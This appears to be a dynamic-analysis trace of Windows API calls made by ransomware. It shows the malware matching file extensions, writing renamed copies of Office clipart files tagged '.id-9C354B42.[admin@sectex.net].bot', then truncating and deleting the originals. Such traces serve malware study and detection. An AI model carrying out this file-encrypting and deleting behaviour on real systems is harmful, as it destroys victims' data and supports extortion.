	[0141.111] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.111] lstrlenW (lpString=".xlsx") returned 5
	[0141.111] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.111] lstrlenW (lpString=".ppt") returned 4
	[0141.111] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63
	[0141.111] lstrlenW (lpString=".zip") returned 4
	[0141.111] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.111] lstrlenW (lpString=".rar") returned 4
	[0141.111] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.111] lstrlenW (lpString=".bz2") returned 4
	[0141.111] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.111] lstrlenW (lpString=".7z") returned 3
	[0141.111] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63
	[0141.111] lstrlenW (lpString=".dbf") returned 4
	[0141.111] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63
	[0141.111] lstrlenW (lpString=".1cd") returned 4
	[0141.111] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 63
	[0141.111] lstrlenW (lpString=".jpg") returned 4
	[0141.111] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.112] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.112] lstrlenW (lpString="BL00008_.WMF") returned 12
	[0141.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0141.114] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=12520) returned 1
	[0141.114] CloseHandle (hObject=0x3c4) returned 1
	[0141.114] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf")) returned 0x20
	[0141.114] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0141.115] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.115] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.119] GetLastError () returned 0x0
	[0141.119] ReadFile (in: hFile=0x3c4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x30e8, lpOverlapped=0x0) returned 1
	[0141.124] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x30f0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x30f0, lpOverlapped=0x0) returned 1
	[0141.125] ReadFile (in: hFile=0x3c4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.125] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.126] SetEndOfFile (hFile=0x3ac) returned 1
	[0141.126] CloseHandle (hObject=0x3ac) returned 1
	[0141.126] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.126] SetEndOfFile (hFile=0x3c4) returned 1
	[0141.130] CloseHandle (hObject=0x3c4) returned 1
	[0141.130] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.131] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf")) returned 1
	[0141.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63
	[0141.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63
	[0141.131] lstrlenW (lpString=".doc") returned 4
	[0141.131] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.131] lstrlenW (lpString=".docx") returned 5
	[0141.131] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.131] lstrlenW (lpString=".pdf") returned 4
	[0141.131] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.131] lstrlenW (lpString=".xls") returned 4
	[0141.131] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.131] lstrlenW (lpString=".xlsx") returned 5
	[0141.131] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.131] lstrlenW (lpString=".ppt") returned 4
	[0141.131] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63
	[0141.131] lstrlenW (lpString=".zip") returned 4
	[0141.131] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.131] lstrlenW (lpString=".rar") returned 4
	[0141.131] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.131] lstrlenW (lpString=".bz2") returned 4
	[0141.131] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.131] lstrlenW (lpString=".7z") returned 3
	[0141.132] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63
	[0141.132] lstrlenW (lpString=".dbf") returned 4
	[0141.132] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63
	[0141.132] lstrlenW (lpString=".1cd") returned 4
	[0141.132] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63
	[0141.132] lstrlenW (lpString=".jpg") returned 4
	[0141.132] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63
	[0141.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63
	[0141.132] lstrlenW (lpString=".doc") returned 4
	[0141.132] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.132] lstrlenW (lpString=".docx") returned 5
	[0141.132] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.132] lstrlenW (lpString=".pdf") returned 4
	[0141.132] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.132] lstrlenW (lpString=".xls") returned 4
	[0141.132] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.132] lstrlenW (lpString=".xlsx") returned 5
	[0141.132] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.132] lstrlenW (lpString=".ppt") returned 4
	[0141.132] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63
	[0141.132] lstrlenW (lpString=".zip") returned 4
	[0141.132] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.132] lstrlenW (lpString=".rar") returned 4
	[0141.132] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.132] lstrlenW (lpString=".bz2") returned 4
	[0141.132] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.132] lstrlenW (lpString=".7z") returned 3
	[0141.132] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63
	[0141.133] lstrlenW (lpString=".dbf") returned 4
	[0141.133] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63
	[0141.133] lstrlenW (lpString=".1cd") returned 4
	[0141.133] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63
	[0141.133] lstrlenW (lpString=".jpg") returned 4
	[0141.133] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.133] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.133] lstrlenW (lpString="BL00012_.WMF") returned 12
	[0141.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0141.338] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=9818) returned 1
	[0141.338] CloseHandle (hObject=0x384) returned 1
	[0141.338] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf")) returned 0x20
	[0141.434] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.434] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0141.435] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.435] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0141.435] GetLastError () returned 0x0
	[0141.435] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x265a, lpOverlapped=0x0) returned 1
	[0141.464] WriteFile (in: hFile=0x3b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2660, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2660, lpOverlapped=0x0) returned 1
	[0141.465] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.465] WriteFile (in: hFile=0x3b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.465] SetEndOfFile (hFile=0x3b8) returned 1
	[0141.483] CloseHandle (hObject=0x3b8) returned 1
	[0141.483] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.483] SetEndOfFile (hFile=0x31c) returned 1
	[0141.486] CloseHandle (hObject=0x31c) returned 1
	[0141.486] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.517] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00012_.wmf")) returned 1
	[0141.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63
	[0141.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63
	[0141.518] lstrlenW (lpString=".doc") returned 4
	[0141.518] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.518] lstrlenW (lpString=".docx") returned 5
	[0141.518] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.518] lstrlenW (lpString=".pdf") returned 4
	[0141.518] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.518] lstrlenW (lpString=".xls") returned 4
	[0141.518] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.518] lstrlenW (lpString=".xlsx") returned 5
	[0141.518] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.518] lstrlenW (lpString=".ppt") returned 4
	[0141.518] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63
	[0141.518] lstrlenW (lpString=".zip") returned 4
	[0141.518] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.518] lstrlenW (lpString=".rar") returned 4
	[0141.518] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.518] lstrlenW (lpString=".bz2") returned 4
	[0141.518] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.518] lstrlenW (lpString=".7z") returned 3
	[0141.518] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63
	[0141.518] lstrlenW (lpString=".dbf") returned 4
	[0141.518] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63
	[0141.518] lstrlenW (lpString=".1cd") returned 4
	[0141.518] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63
	[0141.519] lstrlenW (lpString=".jpg") returned 4
	[0141.519] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63
	[0141.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63
	[0141.519] lstrlenW (lpString=".doc") returned 4
	[0141.519] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.519] lstrlenW (lpString=".docx") returned 5
	[0141.519] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.519] lstrlenW (lpString=".pdf") returned 4
	[0141.519] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.519] lstrlenW (lpString=".xls") returned 4
	[0141.519] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.519] lstrlenW (lpString=".xlsx") returned 5
	[0141.519] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.519] lstrlenW (lpString=".ppt") returned 4
	[0141.519] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63
	[0141.519] lstrlenW (lpString=".zip") returned 4
	[0141.519] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.519] lstrlenW (lpString=".rar") returned 4
	[0141.519] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.519] lstrlenW (lpString=".bz2") returned 4
	[0141.519] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.519] lstrlenW (lpString=".7z") returned 3
	[0141.519] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63
	[0141.519] lstrlenW (lpString=".dbf") returned 4
	[0141.519] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63
	[0141.519] lstrlenW (lpString=".1cd") returned 4
	[0141.519] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 63
	[0141.519] lstrlenW (lpString=".jpg") returned 4
	[0141.520] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.520] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.520] lstrlenW (lpString="BL00152_.WMF") returned 12
	[0141.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0141.520] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=1516) returned 1
	[0141.520] CloseHandle (hObject=0x31c) returned 1
	[0141.520] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf")) returned 0x20
	[0141.520] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0141.521] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.521] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0141.521] GetLastError () returned 0x0
	[0141.521] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x5ec, lpOverlapped=0x0) returned 1
	[0141.574] WriteFile (in: hFile=0x3b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x5f0, lpOverlapped=0x0) returned 1
	[0141.575] ReadFile (in: hFile=0x31c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.575] WriteFile (in: hFile=0x3b8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.576] SetEndOfFile (hFile=0x3b8) returned 1
	[0141.576] CloseHandle (hObject=0x3b8) returned 1
	[0141.576] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.576] SetEndOfFile (hFile=0x31c) returned 1
	[0141.578] CloseHandle (hObject=0x31c) returned 1
	[0141.578] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.620] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf")) returned 1
	[0141.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63
	[0141.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63
	[0141.620] lstrlenW (lpString=".doc") returned 4
	[0141.620] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.620] lstrlenW (lpString=".docx") returned 5
	[0141.620] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.621] lstrlenW (lpString=".pdf") returned 4
	[0141.621] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.621] lstrlenW (lpString=".xls") returned 4
	[0141.621] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.621] lstrlenW (lpString=".xlsx") returned 5
	[0141.621] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.621] lstrlenW (lpString=".ppt") returned 4
	[0141.621] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63
	[0141.621] lstrlenW (lpString=".zip") returned 4
	[0141.621] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.621] lstrlenW (lpString=".rar") returned 4
	[0141.621] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.621] lstrlenW (lpString=".bz2") returned 4
	[0141.621] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.621] lstrlenW (lpString=".7z") returned 3
	[0141.621] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63
	[0141.621] lstrlenW (lpString=".dbf") returned 4
	[0141.621] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63
	[0141.621] lstrlenW (lpString=".1cd") returned 4
	[0141.621] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63
	[0141.621] lstrlenW (lpString=".jpg") returned 4
	[0141.621] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63
	[0141.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63
	[0141.621] lstrlenW (lpString=".doc") returned 4
	[0141.621] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.621] lstrlenW (lpString=".docx") returned 5
	[0141.621] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.621] lstrlenW (lpString=".pdf") returned 4
	[0141.622] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.622] lstrlenW (lpString=".xls") returned 4
	[0141.622] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.622] lstrlenW (lpString=".xlsx") returned 5
	[0141.622] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.622] lstrlenW (lpString=".ppt") returned 4
	[0141.622] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
